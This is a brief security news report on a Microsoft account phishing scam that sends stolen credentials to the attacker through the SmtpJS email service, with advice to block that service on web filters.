loader gif

New Microsoft phishing scam sends stolen credentials to scammers via SmtpJS service

New Microsoft phishing scam sends stolen credentials to scammers via SmtpJS service
  • The phishing page used in this scam, utilizes the SmtpJS service to send the stolen credentials to the attacker via JavaScript.
  • This methodology benefits security researchers and analysts as they can view the source for the landing page to see the configuration being used by the SmtpJS service.

A brief overview

Researchers from MalwareHunterTeam have observed a new Microsoft account phishing scam, wherein the phishing page uses the SmtpJS service to send the stolen credentials to the scammer via an email.

  • In this scam, attackers use fake Microsoft login templates that prompt users to submit their Microsoft account credentials.
  • Once users submit their credentials, the phishing page will display a message stating that the submitted credentials are incorrect while saving the credentials in a database for later use.
  • The phishing page then utilizes the SmtpJS service to send the stolen credentials to the attacker via JavaScript.

The methodology that benefits the researchers

This technique benefits security researchers and analysts as they can view the source for the landing page to see the configuration being used by SmtpJS.

  • The configuration used by the SmtpJS service includes the sender’s email address, the stolen credentials, the scammer’s email address to which the email will be sent to, and the secure token need to send an email via SmtpJS.
  • This configuration is also passed along to smtpjs.com when a user enters their credentials so that it can generate an email to the specified user.

Using this config information, analysts and researchers can easily track the scammer behind the campaign.

Recommendations

System administrators can also benefit from this methodology by blocking the SMtpJS service on their web filters. It is best to block access to the SmtpJS service and phishing pages that use the service to stay protected against such scams.

loader gif